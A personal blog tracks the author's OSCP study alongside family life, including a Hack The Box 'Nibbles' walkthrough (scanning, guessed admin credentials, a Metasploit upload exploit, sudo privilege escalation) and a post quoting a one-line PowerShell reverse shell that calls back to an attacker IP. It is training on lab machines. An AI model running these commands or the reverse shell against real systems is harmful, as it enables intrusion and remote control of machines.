Root. On an active HTB. Woot!

Okay, so through working at the box for the most of yesterday and this morning, I friggen got user and root flags for Postman on HTB.  I am not gonna lie, I did reach out for a push or two through the HTB Discord Channel, but no major hints were given, and through a bit of perseverance, I did it. Yay!  Upwards and Onwards!

Anyone who is in this field, wow.  There is so much to learn that I don’t know, and it’s amazing to me to get in the chats and on the web and pour over the articles, cracks, and loopholes that some of the brightest people in this field have come across.  It takes major perseverance and sometimes that quick trip to the bathroom for an ah-ha moment that leads you further down the victory hole.

I have also been listening to another book by Cal Newport – So Good They Can’t Ignore You.  I haven’t gotten too far in the book to quickly start picking up things that resonate with me and give me some clarity on how I need to look a bit more at what I am doing here.  I was always in the mindset of “learning to love what you do rather than following what you love”.  Cal iterated this in the book by basically throwing shade on people who follow their passion.  Simply being that many of us don’t know our passion or think we do, only to ask “is this really what I want out of life?”

I go back to work from Parental leave on Monday.  I haven’t been there for a while.  I want to bring about the “craftsman” mentality to my work – basically, it doesn’t matter what you do, just, as the words of Steve Martin – be so good they can’t ignore you.  I aspire to, every day, work towards this.  I have spent so much of my life caring about what people think.  I also have thought to myself – “I tried the OSCP once, so now I can add it to my resume and people will be lining up to ask me to come to be a pentester for them.”  I am so naive sometimes to myself.

I will stop caring so much about the meetings, the reflection of whether or not I have imposter syndrome, and just focus on the Deep Work of crafting myself into a better me, a more skilled me.  This is my modus operandi.  I will have two bars – one on getting better and more skilled at the policy/risk work I do for the government, and one on working at my technical competency through HTB/PentesterLab.  Then onto VHL, and then circle back to the OSCP, or maybe just get the eJPT.  (Why not?)

All this while adding exercise to my life (running in the AM with Sandy, the family dog, FTW) and being a good father/husband/trance addict.  Yeah, so I think Trance Junkie Podcast will have to wait till the kids are more independent and I can do simple things that don’t align with moving the bar forward for me.

I want to thank God and my wife for helping me find some clarity throughout this week.  Continuing to meditate and practice will help me move myself to where I want to be in a year.  What does that look like?  Well, it’s most likely not an OSCP cert, but it is someone who has moved the bar significantly closer to that cert, someone who is more confident at his job, and someone who continues to be amazed at the existence of his children.

Hack The Box :: Nibbles Walk-through

Priv esc through me for a loop on this one

This is a small win for me. It’s a retired box so there are a lot of walk-throughs on this one already. The user flag wasn’t too hard to get (minus simply guessing the credentials). It was escalating myself to root that took a while. The reason for this is that out of all the walk-throughs, none of the privesc could be replicated. I thought perhaps I could help by showing what I did, and if you somehow cross the web with the same issue, that this might be a crumb for you to push through.

First, I ran nmap on the target. I chose to be verbose on everything as my connection to the web is pretty poor at the moment.

nmap -sC -sV -oA initial -vvv 10.10.10.75
port 80 and 22

Looks like port 80 and 22 are open. So let’s mosey to http://10.10.10.75/.

Looking at the code, I found /nibbleblog/ as a path in the URL

Let’s go there.

So, generally, I would either run a nikto scan or gobuster. Let’s do a gobuster and see if there are any interesting findings.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php -u http://10.10.10.75/nibbleblog/ -t 75
…go go gobuster!

Well, http://10.10.10.75/nibbleblog/admin.php looks super interesting.

Here is where there is an enumeration jump. If you go back to the blog, you will see a link for the atom feed: http://10.10.10.75/nibbleblog/feed.php. The title is nibbles. Also, looking at http://10.10.10.75/nibbleblog/content/private/users.xml shows admin as a user. So yah, play with that and you get the following:

Username: admin
Password: nibbles

I started looking for exploits at this point, and it looks like the best one requires metasploit: https://www.exploit-db.com/exploits/38489. So let’s do it.

root@kali:~# msfconsole

------SNIP--------

       =[ metasploit v5.0.58-dev                          ]
+ -- --=[ 1936 exploits - 1082 auxiliary - 333 post       ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

msf5 > search nibbleblog

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   0  exploit/multi/http/nibbleblog_file_upload  2015-09-01       excellent  Yes    Nibbleblog File Upload Vulnerability

Let’s use that module.

msf5 > use exploit/multi/http/nibbleblog_file_upload 

Set all the required options:

and send.

damn it feels good to get meterpreter…

drop into shell…

meterpreter > shell
Process 2902 created.
Channel 0 created.
id 
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
pwd
/var/www/html/nibbleblog/content/private/plugins/my_image

Let’s spawn a TTY shell using the following command:

python3 -c "import pty; pty.spawn('/bin/bash')"

Let’s go ahead and get the user.txt flag!

nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cat /home/nibbler/user.txt
<ml/nibbleblog/content/private/plugins/my_image$ cat /home/nibbler/user.txt

Now, Privesc. This was the hardest thing and took me a while to get it down. But finally, this article did me good, and I was able to work it out. One of the first things is figure out is if you have any files that you can invoke as root. So you do that by calling the command:

sudo -l

so we can run /home/nibbler/personal/stuff/monitor.sh as root. Going into /home/nibbler, you are going to want to unzip personal.zip to get that monitor.sh file. Now we need to modify the monitor.sh file to have the following code:

#!/bin/bash
/bin/bash -i

You can do this by either forwarding it to the end of the text file, or uploading the file using netcat and overwrite it, or get back to meterpreter and upload the file. Make sure you make the file executable (chmod +x monitor.sh)

Then just run the following command:

nibbler@Nibbles:/home/nibbler$ sudo ./monitor.sh
I am root!

And there we go. Now to get the flag…

cat /root/root.txt

I thoroughly enjoyed this box. Please let me know this was helpful to you by DMing me on twitter @Mova. Thanks!

Update with a path forward…

For the last few days of parental leave, I will have some opportunity to reflect and decide if I would like to continue my OSCP journey. As of right now, the answer is yes. If others have done it, why not me? I think it’s pretty common to take a test, and if you fail it, flail around a bit before getting your grounding. I feel like I have regained some grounding and have a path forward. There are a few rocks on the path, but it’s a path none the less.

I have 6 days – between now and Saturday where I will have some time to myself to do some deep work and deep thinking about my professional competency. I am going to not only use this time to reflect on that but also do some minimal fasting, exercising prayer, and meditation. I have a few habits that I need to place a stake in the ground on (little things) and work on my path forward with studying. I am inspired to do this through Bill Gate’s think-weeks, and also a book I listened to called “Deep Work: Rules for Focused Success in a Distracted World” by Cal Newport. Cal is a computer science teacher at Georgetown University, and he book spoke loads to me.

I have really been thinking about the amount of time that I take studying around OSCP. Things like Bash, Python, Linux, and Powershell. I think if I do that, I will never get to the actual pen-testing. I needed something structured, and just doing Hack the Box/VulnHub wasn’t structured.

Step in PentesterLab. It’s 30 bucks a month and structured. I really like the fact that there is a public profile where I can show the certs I managed to get along the way.

Woot! It’s some direction!

I read a bit about it, and even though it’s a bit more web app pen-testing than OSCP which does cover web pen-testing. but also really focuses on network pen-testing, I really like it. I have done the intro labs and working through *nix currently. To pull in more network pen-testing and the full methodology, I plan on doing a retired HTB machine walkthrough and an active machine on HTB daily – till Sat. I will have to re-assess once I am back at work and don’t have as much time to myself.

I have also been using this blog more like an emotional dump of my studying. This blog really was more for the technical aspects that I was working through on the OSCP, so I will gear it more to that moving forward. No one really cares how I feel all the time. 😛

Once and if I pull some substantial time into PentesterLab and HTB, then we’ll chat about the OSCP.

On to the work!

I feel so far from getting my OSCP… just a little burnt

I have been trying to study, but it’s been rough. My main priority has been my son, and that I think is a good thing. But right now, I have no work responsibility, and I am having a hard time working deep and smart. I am flailing around like a fish out of water.

I am thinking about working on the basics, but it’s just so rough getting through it. I want the sexy stuff, like working on a box all the way through to root. So I figured I would work on the basics for an hour and then do a VulnHub or a HTB… but it’s not working. I can’t think straight. I think I am a bit burnt out.

So I did BsidesDC, and i played in ProsvJoes, and I have to say, that I felt much better about it than I did last year….

I think I really still want this cert. Pressing forward, I will work on a VulnHub first and then dig into a basic again. I also need to think about when I will start the labs again. Maybe after things quiet down a bit from coming back to work.

Studying on Parental Leave

Look at this guy – him and I bonded together yesterday. My wife went back to work, and I chilled with him for the day. I gotta tell ya, he did really well on his bottle. It was honestly day 1, and he is starting to get the bottle down.

My little man!

Which leads to the next thing. So I am on parental leave till November, and I was hoping that I could get some studying in with this dude. Well, I need to be patient with myself since that’s not going to happen for a while – at least till we get used to each other. So, yah, it’s going to be slow going with OSCP again. I haven’t signed back up for the labs, which is good. There is a lot I can do without them and I once the labs are up, the clock is ticking to get them done.

I really , really want to pass this exam. I have to say though, I have already been really learning a lot, but I have a long way to go to pass. I think I can do it.

The Journey is so long and I am so tired

This is getting ridiculous. It’s mainly my fault, but some of these exercises in the labs make me want to bang my head on the wall – really hard.

I am trying, and documenting the exercises. I have been working at them for over five months now, and yes, there are a few that have given me some hiccups. The ones that are hitting me hard are using sqlmap to obtain a shell on a target machine, using password attacks that were described in the book, and the Port Redirection/Tunneling. A lot of this is my fault for not going harder at the problems, and faster. For example, I did get the BoFs, but that was seriously like almost a half a year ago.

It looks like I have 12 days left in the labs, and I am definitely not going to get 10 boxes as root and document them all in that amount of time. Oh yeah, I also signed up for the test in September. Oh, and my wife and I are expecting a child in July.

To make matters worse, the prices are going up. So, it’s been real, but I am not sure if I am going to get this cert any time soon. I am not quite sure where to go from here. So let’s analyze, shall we?

Option one:
(ノಠ益ಠ)ノ彡┻━┻

Okay, let’s put the table back….
┳━┳ ヽ(ಠل͜ಠ)ノ

Let’s try that again:

  1. Just spend every morning for 2 hours in the lab and the exercises. Try to do the areas that you didn’t get (the exercises that you didn’t get) and if you don’t get them, it’s no biggie. Just try to get back into the material, and hit it hard for the last 12 days.
  2. Post-time: You didn’t get the 5 points. You’ll get them after your first attempt at the exam. Because face it, you aren’t going to pass your first attempt. So here is where HTB and ippsec walkthroughs will help you. Step one, find some free BoFs and PRACTICE them. You know that’s a solid 20 points.
  3. Walkthrough the boxes in July. Start figuring out your methods. Just try to get as comfortable you can to at least try the exam in September. August, keep on going. Learn as much as you can from tutorials, the book, watch the videos again and relate them to HTBs.
  4. Fri, 06 Sep 2019, 05:00 (America/New_York), just try.
  5. Buy 30 days of lab – $300 bones. Finish up the exercises and the boxes. Get the 5 points, then schedule your exam again. Take it.

Remember what your wife said, it’s not how quickly you pass, but when you pass. Don’t give up, don’t get scared. Just go for it. You got this.

Finally, I am getting to Metasploit. Wow.

Well, I haven’t written for a while, but my daughter turned 4, my wife is expecting in July, and I am waking up pretty early to start studying these days. It’s a slow process, but I’ll get there. My plan is finish the labs, practice on hackthebox.eu and take the test in early September. I feel like failing the first time is simply a right of passage, so if that happens, at least I’ll know what to expect for the next time. I will get this cert. It might take time, but I am going to get it.

I am getting to the end of the labs, and I know now why metasploit is last and why you can only use it on one box – it’s pretty powerful. I did use it to pop my first shell on the lab machines – using 08-067 to exploit SMB!

This gif never gets old…

I didn’t know about meterpreter before the exploit, so I was hanging onto my shell for dear life, trying to upload a privilege escalation executable using certutil and tftp, but the shell was non-interactive and yeah… didn’t get far. But I started reading about meterpreter and all I could think about is how I am going to root that box now with my new knowledge.

The labs ask to perform a few things that I had to skip and gain my knowledge on – i.e., using metasploit to dump hashes and pass the hash. So now, I have to go back and finish up those labs. My lab report, w/o and writeups of pwning the 10 machines is almost at 200 pages. I am not going to fail to get those 5 points. Even if I have to come back and pay for more lab time.

I will have to say that I am really enjoying my time learning through PWK. People slam it for not being current (the exploits and the material), but I think that’s part of it – TRYING HARDER. Also, forget that man, it’s a VERY solid foundation for pen testing.

RCE using RFI attacks

Now that I have finished tackling LFI attacks, I am moving on to try to do a similar exploit, but rather than executing something from the victim machine, I will execute from my computer (the attacking machine) – hence “Remote File Inclusion” attacks, or RFI attacks.

I seem to be having some trouble with this one, and ultimately going with pausing on this and rethinking. My first thought was to serve php-reverse-shell from pentestmonkey from my machine, but it didn’t work.

I then backed up and thought to myself if the shell was working at all. So I decided to just upload the script on my victim machine and see if I could get a reverse shell. Well, my windows victim machine is super old and http cacheing wasn’t even letting me download the reverse shell to the machine over 80. I tried tftp, and nada. I finally zipped the script, and downloaded the .zip file.

Then I went ahead and unzipped on my victim machine and tried it. It would connect over netcat but then close the connection. So yeah, that’s not working. Honestly, at this point, I don’t even think that I should be downloading outside scripts to get the labs to work. So I am going to back up again, think about having nc.exe served from my machine, and execute a command to that executable. Then at least I can move on with the labs.

I do think there is value to getting the php-reverse-shell from pentestmonkey working though – it would be super valuable when I start popping boxes.

RCE using LFI attacks – happy St. Patty’s Day!

Top of the mornin’ to ya…

I like to wake up early to study. I mean, really early. Like today, I woke up at 3:30 am today to tackle this issue of gaining remote code execution (RCE) using Local File Inclusion attacks (LFI). I was hanging out at a coffee shop till pretty late last night, and couldn’t get it. This AM, I realized a few mistakes in my URL and it looked like I was able to upload nc.exe to the victim machine using tftp. Once I did this, I could execute nc.exe to call back to my machine.

This got me thinking a bit though, and I started wondering if I didn’t have tftp on my vulnerable windows box. So I looked up a few reverse shells here, but most of them were built for a victim linux machine (i.e. bash commands).

I found one that supposedly works with a powershell command:

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

I also need to think a bit about this. I need to explore more about how to execute a command on a remote machine that would send a shell to my attacking machine (reverse shells, son). Ippsec’s channel is a go-to for a lot of this.

If I don’t have tftp to upload nc.exe on an LFI through php or another web application code, then I would need to get the reverse shell to work on one command – thought that PS would do it, but nada. Ippsec actually had trouble with this too on bashed, so actually, that means I might be doing it right.

Listening to Irish gigs right now – takes me back when I went to Ireland with my wife.

Sláinte!

…and I just extended my lab time.

This is a journey folks. And my journey includes a kid and a full time job. So right now, I am hanging around Chapter 13, Local File Inclusion vulnerabilities, and in order to pop 10 boxes and finish the labs, I am going to need the extra time.

One of things that they say in the exercise is that they quote Lincoln – “Give me six hours to chop down a tree and I will spend the first four sharpening the ax”. I think I just need a few more days, not hours, to sharpen. 🙂

It’s a little tricky, and I really like how OffSec trains you in the labs to think about the cracks. Those cracks that can get you to root on a box. Off to LFIs!